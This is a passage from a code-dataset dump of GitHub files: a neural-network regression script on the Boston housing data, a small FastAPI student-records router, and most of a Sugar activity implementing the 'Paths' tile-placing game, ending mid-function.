"usage_type": "call"}, {"api_name": "math.pi", "line_number": 243, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 244, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 246, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 247, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 249, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 252, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 255, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 257, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 258, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 260, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 261, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 263, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 266, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 268, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 269, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 271, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 272, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 275, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 277, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 280, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 282, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 283, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 285, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 286, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 288, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 289, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 294, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 297, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 299, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 300, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 302, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 303, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 305, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 306, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 308, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 311, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 313, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 314, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 316, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 317, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 319, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 320, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 322, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 325, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 327, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 328, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 330, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 331, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 333, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 334, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 336, "usage_type": "call"}, {"api_name": "ezdxf.math.Vector", "line_number": 339, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 341, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 342, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 344, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 345, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 347, "usage_type": "attribute"}, {"api_name": "ezdxf.math.Vector", "line_number": 348, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 292, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 352, "usage_type": "call"}]}
+{"seq_id": "12878303693", "text": "import numpy as np\nimport pandas as pd\nimport multiLayerPerceptron.MLP_layer as layer\nfrom multiLayerPerceptron.MLP_network import MultiLayerPerceptron\nfrom sklearn.datasets import load_boston\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import KFold \nfrom sklearn.preprocessing import MinMaxScaler \nimport math \nfrom metrics import *\n\nX = load_boston().data\ny= load_boston().target\nscalar = MinMaxScaler()\nscalar.fit(X)\nX = scalar.transform(X)\nX = X.reshape(X.shape[0], 1, 13)\nX = X.astype('float32')\n\n# Defining the Network\nnet = MultiLayerPerceptron()\nnet.add(layer.FullyConnectedLayer(13, 40)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(40, 13)) \nnet.add(layer.ActivationLayer(layer.sigmoid, layer.sigmoid_prime))\nnet.add(layer.FullyConnectedLayer(13, 1)) \n\nkf = KFold(n_splits=3)\n\ni = 1\nov_rmse = 0\nnet.use(layer.mse, layer.mse_prime)\nfor train_index, test_index in kf.split(X):\n X_train = X[train_index]\n y_train = y[train_index]\n X_test = X[test_index]\n y_test = y[test_index]\n\n net.fit(X_train, y_train, epochs=100, learning_rate=3e-3)\n y_hat = net.predict(X_test)\n rmse_curr = rmse(pd.Series(y_hat),pd.Series(y_test))\n print(f\"RMSE error for Fold {i}:\", rmse_curr)\n ov_rmse += rmse_curr\n i+=1\n\nprint(\"Overall RMSE:\", ov_rmse/3)\n\n\n", "repo_name": "AdityaPusalkar/assignment-3-AdityaPusalkar", "sub_path": "q6b.py", "file_name": "q6b.py", "file_ext": "py", "file_size_in_byte": 1413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.load_boston", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_boston", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 15, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_network.MultiLayerPerceptron", "line_number": 22, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 23, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 23, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 24, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 24, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 25, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 25, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.ActivationLayer", "line_number": 26, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 26, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.sigmoid_prime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer.FullyConnectedLayer", "line_number": 27, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 27, "usage_type": "name"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 29, "usage_type": "call"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse", "line_number": 33, "usage_type": "attribute"}, {"api_name": "multiLayerPerceptron.MLP_layer", "line_number": 33, "usage_type": "name"}, {"api_name": "multiLayerPerceptron.MLP_layer.mse_prime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "18020203725", "text": "from typing import List\nfrom fastapi import APIRouter, HTTPException\nfrom app.models.Alumno import Alumno\nimport logging\n\nlogger = logging.getLogger(__name__)\nrouter = APIRouter(prefix=\"/alumnos\",\n tags=[\"alumnos\"], )\n\n\n@router.get(\"/\", response_model=List[Alumno])\ndef alumnos_get_all():\n # alumnos = Alumno.get_all()\n alumnos = []\n logger.info('alumnos %s', alumnos)\n\n return alumnos\n\n\n@router.get('/{alumno_id}', response_model=Alumno)\ndef get_detail(alumno_id: int):\n alumno = Alumno.get_by_id(alumno_id)\n if alumno is None:\n raise HTTPException(status_code=404, detail=f\"Alumno con id:{alumno_id} not found\")\n\n return alumno\n\n\n@router.put('/{persona_id}', response_model=Alumno)\ndef update_detail(alumno_id: int, alumno: Alumno):\n alumno_original = Alumno.get_by_id(alumno_id)\n print(alumno)\n return alumno\n", "repo_name": "cids-arquitectura/fastapi_microservice", "sub_path": "app/routes/alumnos.py", "file_name": "alumnos.py", "file_ext": "py", "file_size_in_byte": 867, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 11, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 22, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 24, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 30, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno.get_by_id", "line_number": 31, "usage_type": "call"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 31, "usage_type": "name"}, {"api_name": "app.models.Alumno.Alumno", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "44034596500", "text": "from gettext import gettext as _\n\nimport logging\n_logger = logging.getLogger('paths-activity')\n\nfrom sugar3.graphics import style\nGRID_CELL_SIZE = style.GRID_CELL_SIZE\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\n\nfrom grid import Grid\nfrom hand import Hand\nfrom deck import Deck\nfrom tile import error_graphic, highlight_graphic, blank_tile\nfrom utils import json_dump\nfrom constants import ROW, COL, NORTH, EAST, SOUTH, WEST, TILE_WIDTH, \\\n TILE_HEIGHT, HIDE, BOARD, GRID, TILES, TOP, OVER_THE_TOP\nfrom sprites import Sprites\n\nOFFSETS = [-COL, 1, COL, -1]\nMY_HAND = 0\nROBOT_HAND = 1\n\n\nclass Game():\n\n def __init__(self, canvas, parent=None, colors=['#A0FFA0', '#FF8080']):\n self._activity = parent\n self.colors = colors\n\n # Starting from command line\n if parent is None:\n self._running_sugar = False\n self._canvas = canvas\n else:\n self._running_sugar = True\n self._canvas = canvas\n parent.show_all()\n\n self._canvas.set_can_focus(True)\n self._canvas.add_events(Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK |\n Gdk.EventMask.POINTER_MOTION_MASK)\n self._canvas.connect(\"draw\", self._draw_cb)\n self._canvas.connect(\"button-press-event\", self._button_press_cb)\n self._canvas.connect(\"button-release-event\", self._button_release_cb)\n self._canvas.connect(\"motion-notify-event\", self._mouse_move_cb)\n self._canvas.connect(\"key_press_event\", self._keypress_cb)\n\n self._width = Gdk.Screen.width()\n self._height = Gdk.Screen.height() - (GRID_CELL_SIZE * 1.5)\n self._scale = self._height / (8.0 * TILE_HEIGHT)\n self.tile_width = TILE_WIDTH * self._scale\n self.tile_height = TILE_HEIGHT * self._scale\n\n # Generate the sprites we'll need...\n self._sprites = Sprites(self._canvas)\n self.grid = Grid(self._sprites, self._width, self._height,\n self.tile_width, self.tile_height, self._scale,\n colors[0])\n self.deck = Deck(self._sprites, self._scale, colors[1])\n self.deck.board.move((self.grid.left, self.grid.top))\n self.hands = []\n self.hands.append(Hand(self.tile_width, self.tile_height))\n self._errormsg = []\n for i in range(4):\n self._errormsg.append(error_graphic(self._sprites))\n self._highlight = highlight_graphic(self._sprites, self._scale)\n self._score_card = blank_tile(self._sprites, scale=self._scale * 2,\n color=colors[1])\n self._score_card.set_label_attributes(64)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n\n # and initialize a few variables we'll need.\n self.buddies = []\n self._my_hand = MY_HAND\n self.playing_with_robot = False\n self._all_clear()\n\n def _all_clear(self):\n ''' Things to reinitialize when starting up a new game. '''\n self._hide_highlight()\n self._hide_errormsgs()\n self.deck.hide()\n self.deck.clear()\n self.grid.clear()\n for hand in self.hands:\n hand.clear()\n self.show_connected_tiles()\n\n self._press = None\n self._release = None\n self._dragpos = [0, 0]\n self._total_drag = [0, 0]\n self.last_spr_moved = None\n self._last_tile_played = None\n self._last_tile_orientation = 0\n self._last_grid_played = None\n\n self.whos_turn = MY_HAND\n self._waiting_for_my_turn = False\n self._waiting_for_robot = False\n self.placed_a_tile = False\n self._there_are_errors = False\n\n self.score = 0\n self._score_card.set_layer(HIDE)\n self._score_card.move(((int(self._width / 2) - self.tile_width),\n int(self._height / 2) - self.tile_height))\n self.saw_game_over = False\n\n def _initiating(self):\n if not self._running_sugar:\n return True\n return self._activity.initiating\n\n def new_game(self, saved_state=None, deck_index=0):\n ''' Start a new game. '''\n self._all_clear()\n\n # If we are not sharing or we are the sharer...\n if not self.we_are_sharing() or self._initiating():\n # Let joiners know we are starting a new game...\n if self.we_are_sharing():\n self._activity.send_event(\"n\", \" \")\n\n # The initiator shuffles the deck...\n self.deck.shuffle()\n # ...and shares it.\n if self.we_are_sharing():\n self._activity.send_event(\"d\", self.deck.serialize())\n\n # Deal a hand to yourself...\n self.hands[self._my_hand].deal(self.deck)\n\n # ...deal a hand to the robot...\n if self.playing_with_robot:\n if len(self.hands) < ROBOT_HAND + 1:\n self.hands.append(Hand(self.tile_width, self.tile_height,\n remote=True))\n self.hands[ROBOT_HAND].deal(self.deck)\n # ...or deal hands to the joiners.\n elif len(self.buddies) > 1:\n for i, buddy in enumerate(self.buddies):\n if buddy != self._activity.nick:\n self.hands.append(Hand(\n self.tile_width, self.tile_height, remote=True))\n self.hands[i].deal(self.deck)\n self._activity.send_event(\"h\",\n self.hands[i].serialize(buddy=buddy))\n\n # As initiator, you take the first turn.\n self.its_my_turn()\n\n # If we are joining, we need to wait for a hand.\n else:\n self._my_hand = self.buddies.index(self._activity.nick)\n self.its_their_turn(self.buddies[1]) # Sharer will be buddy 1\n\n def we_are_sharing(self):\n ''' If we are sharing, there is more than one buddy. '''\n if len(self.buddies) > 1:\n return True\n\n def _set_label(self, string):\n ''' Set the label in the toolbar or the window frame. '''\n if self._running_sugar:\n self._activity.status.set_label(string)\n self._activity.score.set_label(_('Score: ') + str(self.score))\n elif hasattr(self, 'win'):\n self.win.set_title('%s: %s [%d]' % (_('Paths'), string,\n self.score))\n\n def its_my_turn(self):\n # I need to play a piece...\n self.placed_a_tile = False\n # and I am no longer waiting for my turn.\n self._waiting_for_my_turn = False\n # If I don't have any tiles left, time to redeal.\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self._redeal()\n if self._running_sugar:\n self._activity.set_player_on_toolbar(self._activity.nick)\n self._activity.dialog_button.set_icon_name('go-next')\n self._activity.dialog_button.set_tooltip(\n _('Click after taking your turn.'))\n self._set_label(_('It is your turn.'))\n\n def _redeal(self):\n # Only the sharer deals tiles.\n if not self.we_are_sharing():\n self.hands[self._my_hand].deal(self.deck)\n if self.playing_with_robot:\n self.hands[ROBOT_HAND].deal(self.deck)\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n if self._running_sugar:\n self._activity.dialog_button.set_icon_name(\n 'media-playback-stop-insensitive')\n self._activity.dialog_button.set_tooltip(_('Game over'))\n self.game_over()\n elif self._initiating():\n if self.deck.empty():\n self.game_over()\n return\n if self.deck.tiles_remaining() < COL * len(self.buddies):\n number_of_tiles_to_deal = \\\n int(self.deck.tiles_remaining() / len(self.buddies))\n if number_of_tiles_to_deal == 0:\n number_of_tiles_to_deal = 1 # Deal last tile in deck.\n else:\n number_of_tiles_to_deal = COL\n for i, nick in enumerate(self.buddies):\n self.hands[i].deal(self.deck, number_of_tiles_to_deal)\n # Send the joiners their new hands.\n if nick != self._activity.nick:\n self._activity.send_event(\"h\",\n (self.hands[i].serialize(buddy=nick)))\n\n def took_my_turn(self):\n # Did I complete my turn without any errors?\n if self._there_are_errors:\n self._set_label(_('There are errors—it is still your turn.'))\n return\n\n # After the tile is placed, expand regions of playable grid squares.\n self.show_connected_tiles()\n\n # Are there any completed paths?\n self._test_for_complete_paths(self._last_grid_played)\n\n # If so, let everyone know what piece I moved.\n if self.we_are_sharing():\n self._activity.send_event(\"p\", json_dump([self._last_tile_played,\n self._last_tile_orientation,\n self._last_grid_played]))\n\n self._last_tile_orientation = 0 # Reset orientation.\n # I took my turn, so I am waiting again.\n self._waiting_for_my_turn = True\n if self.last_spr_moved is not None:\n self.last_spr_moved.set_layer(TILES)\n self.last_spr_moved = None\n self._hide_highlight()\n self._set_label(_('You took your turn.'))\n\n if self.playing_with_robot:\n self.its_their_turn(_('robot'))\n self._waiting_for_robot = True\n gobject.timeout_add(1000, self._robot_turn)\n elif not self.we_are_sharing():\n if self.deck.empty() and \\\n self.hands[self._my_hand].tiles_in_hand() == 0:\n self.game_over()\n else:\n self.its_my_turn()\n elif self._initiating():\n self.whos_turn += 1\n if self.whos_turn == len(self.buddies):\n self.whos_turn = 0\n else:\n self.its_their_turn(self.buddies[self.whos_turn])\n self._activity.send_event(\"t\", self.buddies[self.whos_turn])\n\n def _robot_turn(self):\n self._robot_play()\n self.show_connected_tiles()\n if not self._waiting_for_robot:\n self.its_my_turn()\n\n def its_their_turn(self, nick):\n # It is someone else's turn.\n if self._running_sugar:\n if not self.playing_with_robot:\n self._activity.set_player_on_toolbar(nick)\n self._activity.dialog_button.set_icon_name('media-playback-stop')\n self._activity.dialog_button.set_tooltip(_('Wait your turn.'))\n self._set_label(_('Waiting for') + ' ' + nick)\n self._waiting_for_my_turn = True # I am still waiting.\n\n def _button_press_cb(self, win, event):\n win.grab_focus()\n x, y = map(int, event.get_coords())\n\n self._dragpos = [x, y]\n self._total_drag = [0, 0]\n\n spr = self._sprites.find_sprite((x, y))\n\n # If it is not my turn, do nothing.\n if self._waiting_for_my_turn:\n self._press = None\n return\n\n self._release = None\n\n # Ignore clicks on background except to indicate you took your turn\n if spr is None or spr in self.grid.blanks or spr == self.deck.board:\n if self.placed_a_tile and spr is None:\n self.took_my_turn()\n self._press = None\n return True\n\n # Are we clicking on a tile in the hand?\n if self.hands[self._my_hand].spr_to_hand(spr) is not None and \\\n not self._there_are_errors:\n self.last_spr_moved = spr\n clicked_in_hand = True\n if self.placed_a_tile:\n self._press = None\n self.took_my_turn()\n else:\n clicked_in_hand = False\n\n # We cannot switch to an old tile.\n if spr == self.last_spr_moved:\n self._press = spr\n\n spr.set_layer(TOP)\n self._show_highlight()\n return True\n\n def _mouse_move_cb(self, win, event):\n \"\"\" Drag a tile with the mouse. \"\"\"\n spr = self._press\n if spr is None:\n self._dragpos = [0, 0]\n return True\n win.grab_focus()\n x, y = map(int, event.get_coords())\n dx = x - self._dragpos[0]\n dy = y - self._dragpos[1]\n spr.move_relative([dx, dy])\n self._move_relative_highlight([dx, dy])\n self._dragpos = [x, y]\n self._total_drag[0] += dx\n self._total_drag[1] += dy\n\n def _button_release_cb(self, win, event):\n win.grab_focus()\n\n self._dragpos = [0, 0]\n\n if self._waiting_for_my_turn:\n return\n\n if self._press is None:\n return\n\n x, y = map(int, event.get_coords())\n spr = self._sprites.find_sprite((x, y))\n self._release = spr\n grid_pos = self.grid.xy_to_grid(x, y)\n hand_pos = self.hands[self._my_hand].xy_to_hand(x, y)\n\n # Placing tile in grid\n if grid_pos is not None and self._it_is_a_drag() and \\\n self.grid.blanks[grid_pos].get_layer() > HIDE:\n\n # Moving to an empty grid position\n if self.grid.grid[grid_pos] is None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n # If the tile was previously in the grid, empty its old pos.\n i = self.grid.spr_to_grid(self._press)\n if i is not None:\n self.grid.grid[i] = None\n\n # Assign the tile to the new grid position.\n self.grid.grid[grid_pos] = tile\n self.placed_a_tile = True\n self._last_tile_played = tile.number\n self._last_grid_played = grid_pos\n\n # If the tile came from the hand, empty its old position.\n i = self.hands[self._my_hand].spr_to_hand(self._press)\n if i is not None:\n self.hands[self._my_hand].hand[i] = None\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n\n self._show_highlight()\n # Returning tile to hand\n elif hand_pos is not None:\n # Make sure there is somewhere to place the tile.\n empty = self.hands[self._my_hand].find_empty_slot()\n if empty is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.hands[self._my_hand].hand_to_xy(empty))\n # Did the tile come from elsewhere in the hand?\n if self.hands[self._my_hand].spr_to_hand(\n self._press) is not None:\n self.hands[self._my_hand].hand[self.hands[\n self._my_hand].spr_to_hand(self._press)] = None\n # or from the grid?\n elif self.grid.spr_to_grid(self._press) is not None:\n self.grid.grid[self.grid.spr_to_grid(self._press)] = None\n self.hands[self._my_hand].hand[empty] = tile\n\n # Remember which tile moved.\n if spr == self.last_spr_moved:\n self.last_spr_moved = None\n\n self._hide_errormsgs()\n self._there_are_errors = False\n else: # Or return tile to the grid\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n\n self._hide_highlight()\n self._press = None\n self._release = None\n self.placed_a_tile = False\n return True\n # Rotate\n elif self._press == self._release and not self._it_is_a_drag():\n tile = self.deck.spr_to_tile(spr)\n tile.rotate_clockwise()\n self._last_tile_orientation = tile.orientation\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n self._show_highlight()\n\n # In limbo: return to grid\n if hand_pos is None and x < self.grid.left:\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n self._hide_highlight()\n\n self._snap_to_grid(self._release)\n self._test_for_bad_paths(self.grid.spr_to_grid(self._press))\n self._press = None\n self._release = None\n return True\n\n def _snap_to_grid(self, spr):\n ''' make sure a tile is aligned in its grid position '''\n for i in range(COL * ROW):\n if self.grid.grid[i] is not None:\n self.grid.grid[i].spr.move(self.grid.grid_to_xy(i))\n if self.grid.grid[i].spr == spr:\n self._move_highlight(self.grid.grid_to_xy(i))\n\n def _it_is_a_drag(self):\n ''' The movement was large enough to be consider a drag as opposed\n to a tile rotate. '''\n if self._total_drag[0] * self._total_drag[0] + \\\n self._total_drag[1] * self._total_drag[1] > \\\n self.tile_width * self.tile_height:\n return True\n return False\n\n def _shuffle_up(self, hand):\n ''' Shuffle all the tiles in a hand to the top. '''\n for i, tile in enumerate(self.hands[hand].hand):\n empty = self.hands[hand].find_empty_slot()\n if i > 0 and tile is not None and empty is not None:\n tile.spr.move(self.hands[hand].hand_to_xy(empty))\n self.hands[hand].hand[empty] = tile\n self.hands[hand].hand[i] = None\n\n def game_over(self, msg=_('Game over')):\n ''' Nothing left to do except show the results. '''\n self._set_label(msg)\n self.saw_game_over = True\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self.score += 50 # Bonus points\n else:\n for tile in self.hands[self._my_hand].hand:\n if tile is not None:\n self.score -= 2 * tile.get_value() # Penalty\n self._shuffle_up(self._my_hand)\n if self._running_sugar:\n self._activity.score.set_label(_('Score: ') + str(self.score))\n self._score_card.set_label(str(self.score))\n self._score_card.set_layer(OVER_THE_TOP)\n self._score_card.move((int(self.tile_width / 2),\n int(self._height / 2) + 2 * self.tile_height))\n if self.playing_with_robot:\n self._shuffle_up(ROBOT_HAND)\n for tile in range(COL):\n if self.hands[ROBOT_HAND].hand[tile] is not None:\n x, y = self.hands[ROBOT_HAND].hand_to_xy(tile)\n self.hands[ROBOT_HAND].hand[tile].spr.move(\n (self.grid.left_hand + self.grid.xinc, y))\n if self._running_sugar:\n self._activity.set_robot_status(False, 'robot-off')\n elif self.we_are_sharing():\n self._activity.send_event(\"g\", \" \")\n\n def show_connected_tiles(self):\n ''' Highlight the squares that surround the tiles already on the grid.\n '''\n for i in range(ROW * COL):\n if self._connected(i):\n self.grid.blanks[i].set_layer(GRID)\n else:\n self.grid.blanks[i].set_layer(HIDE)\n\n def _connected(self, tile):\n ''' Does tile abut the path? '''\n if self.grid.grid.count(None) == ROW * COL:\n return True\n if self.grid.grid[tile] is not None: # already has a tile\n return False\n # Looking north\n if tile >= COL and self.grid.grid[tile + OFFSETS[0]] is not None:\n return True\n # Looking east\n if tile % ROW < ROW - 1 and \\\n self.grid.grid[tile + OFFSETS[1]] is not None:\n return True\n # Looking south\n if tile < (ROW - 1) * COL and \\\n self.grid.grid[tile + OFFSETS[2]] is not None:\n return True\n # Looking west\n if tile % ROW > 0 and self.grid.grid[tile + OFFSETS[3]] is not None:\n return True\n return False\n\n def give_a_hint(self):\n ''' Try to find an open place on the grid for any tile in my_hand. '''\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[self._my_hand].hand:\n if self._try_placement(tile, order[i]):\n # Success, so give hint.\n self.grid.grid[order[i]] = None\n self._show_highlight(\n pos=self.grid.grid_to_xy(order[i]))\n return\n # Nowhere to play.\n self.game_over(_('Nowhere to play.'))\n\n def _robot_play(self):\n ''' The robot tries random tiles in random locations. '''\n # TODO: strategy try to complete paths\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[ROBOT_HAND].hand:\n if self._try_placement(tile, order[i]):\n # Success, so remove tile from hand.\n self.hands[ROBOT_HAND].hand[\n self.hands[ROBOT_HAND].hand.index(tile)] = None\n tile.spr.move(self.grid.grid_to_xy(order[i]))\n tile.spr.set_layer(TILES)\n self._waiting_for_robot = False\n return\n\n # If we didn't return above, we were unable to play a tile.\n self.game_over(_('Robot unable to play'))\n\n def _try_placement(self, tile, i):\n ''' Try to place a tile at grid posiion i. Rotate it, if necessary. '''\n if tile is None:\n return False\n self.grid.grid[i] = tile\n for j in range(4):\n self._test_for_bad_paths(i)\n if not self._there_are_errors:\n return True\n tile.rotate_clockwise()\n self.grid.grid[i] = None\n return False\n\n def _test_for_complete_paths(self, tile):\n ''' Did this tile complete a path? (or two paths?) '''\n\n # A tile can complete up to two paths.\n self._paths = [[], []]\n break_in_path = [False, False]\n\n # Seed the paths and lists with the current tile.\n if tile is not None:\n self._add_to_path_list(tile, 0, 0)\n if len(self.grid.grid[tile].paths) == 2:\n self._add_to_path_list(tile, 1, 1)\n\n # Walk the path.\n for p in range(2):\n tile, path = self._tile_to_test(p)\n while(tile is not None):\n self._test(tile, path, p, self._test_a_neighbor)\n self._tile_has_been_tested(tile, path, p)\n tile, path = self._tile_to_test(p)\n # Is the path complete?\n for i in self._paths[p]:\n if not self._test(i[0], i[1], None, self._test_a_connection):\n break_in_path[p] = True\n if not break_in_path[p] and len(self._paths[p]) > 0:\n for i in self._paths[p]:\n self.grid.grid[i[0]].set_shape(i[1])\n self.score += self.grid.grid[i[0]].get_value()\n\n def _tile_to_test(self, test_path):\n ''' Find a tile that needs testing. '''\n for i in self._paths[test_path]:\n if i[2] is False:\n return i[0], i[1]\n return None, None\n\n def _add_to_path_list(self, tile, tile_path, test_path):\n ''' Only add a tile to the path if it is not already there. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n return\n self._paths[test_path].append([tile, tile_path, False])\n\n def _tile_has_been_tested(self, tile, tile_path, test_path):\n ''' Mark a tile as tested. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n i[2] = True\n return\n\n def _test(self, tile, tile_path, test_path, test):\n ''' Test each neighbor of a block for a connecting path. '''\n if tile is None:\n return False\n for i in range(4):\n if not test(tile, tile_path, test_path, i, tile + OFFSETS[i]):\n return False\n return True\n\n def _test_a_connection(self, tile, tile_path, test_path, direction,\n neighbor):\n ''' Is there a break in the connection? If so return False. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is None:\n return False\n # Which of the neighbor's paths are we connecting to?\n if len(self.grid.grid[neighbor].paths) == 1:\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0:\n return False\n else:\n return True\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0 and\\\n self.grid.grid[neighbor].paths[1][(direction + 2) % 4] == 0:\n return False\n return True\n\n def _test_a_neighbor(self, 